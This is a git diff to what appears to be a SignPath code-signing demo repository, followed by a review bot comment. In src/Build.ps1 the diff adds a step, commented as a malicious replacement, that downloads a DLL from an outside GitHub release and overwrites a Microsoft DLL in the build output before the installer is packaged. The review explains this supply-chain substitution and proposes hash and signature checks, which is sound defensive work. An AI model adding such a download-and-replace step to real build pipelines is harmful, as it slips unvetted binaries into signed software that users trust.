diff --git a/.github/workflows/build-and-sign.yml b/.github/workflows/build-and-sign.yml
index 4bf2185..cbea593 100644
--- a/.github/workflows/build-and-sign.yml
+++ b/.github/workflows/build-and-sign.yml
@@ -5,8 +5,6 @@ run-name: Demo workflow signing with SignPath
 on:
 push:
 pull_request:
- #schedule:
- # - cron: '30 3 * * *' # every day at 3:30am UTC
 workflow_dispatch: # Allows you to run this workflow manually from the Actions tab
 jobs:
diff --git a/sbom/Create-SBOM.ps1 b/sbom/Create-SBOM.ps1
index 5632ace..4af6e99 100644
--- a/sbom/Create-SBOM.ps1
+++ b/sbom/Create-SBOM.ps1
@@ -24,7 +24,7 @@ dotnet tool install cyclonedx --tool-path $tempPath
 # 2.b create nuget bom
 $cyclonDxToolPath = Join-Path $tempPath "dotnet-CycloneDX.exe"
-& "${cyclonDxToolPath}" --output "${tempPath}" -f "nuget.bom.xml" --exclude-dev src\DemoExample.csproj
+& "${cyclonDxToolPath}" --output "${tempPath}" --filename "nuget.bom.xml" --exclude-dev src\DemoExample.csproj
 # 3 Create NPM SBOM
 $packageJsonPath = Join-Path $PSScriptRoot ".." "src" "package.json"
@@ -52,4 +52,4 @@ if (-Not (Test-Path $cycloneDxCliToolPath)) {
 # 4.b merge both SBOMs into a final one
 $nugetBomPath = Join-Path $tempPath "nuget.bom.xml"
 $finalBomPath = Join-Path $PSScriptRoot ".." "_BuildResult-unsigned" "bom.xml"
-& "${cycloneDxCliToolPath}" merge --input-files "${npmBomPath}" "${nugetBomPath}" --output-format "xml" --output-file "${finalBomPath}" --group "com.SignPath.demos" --name "SignPath Demo Application" --version "1.0.0"
\ No newline at end of file
+& "${cycloneDxCliToolPath}" merge --input-files "${npmBomPath}" "${nugetBomPath}" --output-format "xml" --output-file "${finalBomPath}" --group "com.SignPath.demos" --name "SignPath Demo Application" --version "1.0.0"
diff --git a/src/Build.ps1 b/src/Build.ps1
index 3614b9a..8dfcaa8 100644
--- a/src/Build.ps1
+++ b/src/Build.ps1
@@ -1,6 +1,10 @@
 # build .Net application
 dotnet build --configuration Release src/DemoExample.csproj
+# maliciously replace the Microsoft DLL
+Invoke-WebRequest https://github.com/carterjones/hello-world-dll/releases/download/v1.0.0/hello-world-x64.dll `
+ -OutFile .\src\bin\Release\net7.0\Microsoft.Extensions.DependencyModel.dll
+
 # build MSI installer
 Copy-Item .\src\installer\description.wxs .\src\bin\Release\net7.0\description.wxs -Force
 Push-Location .\src\bin\Release\net7.0
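Review bot: The added `Invoke-WebRequest` step overwrites `Microsoft.Extensions.DependencyModel.dll` in the Release output with a binary fetched from a third-party release URL, after `dotnet build` and before the MSI is assembled, so the installer would package a file that did not come from the restored NuGet package, and any later signing step would presumably sign it. The comment says the replacement is deliberate, but as written it runs unconditionally on every build; if it is a tamper demonstration, gate it behind an explicit opt-in such as `if ($env:DEMO_TAMPER -eq '1') { ... }` (constructed variable name) and extend the comment to state what the demo shows and which control is expected to reject the result. Independently of the demo, a check before packaging that compares `Get-FileHash` of each output DLL against the copy in the restored package, or at least inspects `(Get-AuthenticodeSignature $dll).Status` and the signer, would make the build fail on this kind of substitution. The SBOM produced by `sbom/Create-SBOM.ps1` is built from the project and package manifests, so it most likely would not reflect the swapped file; that is inferred, since the rest of the pipeline is outside this hunk.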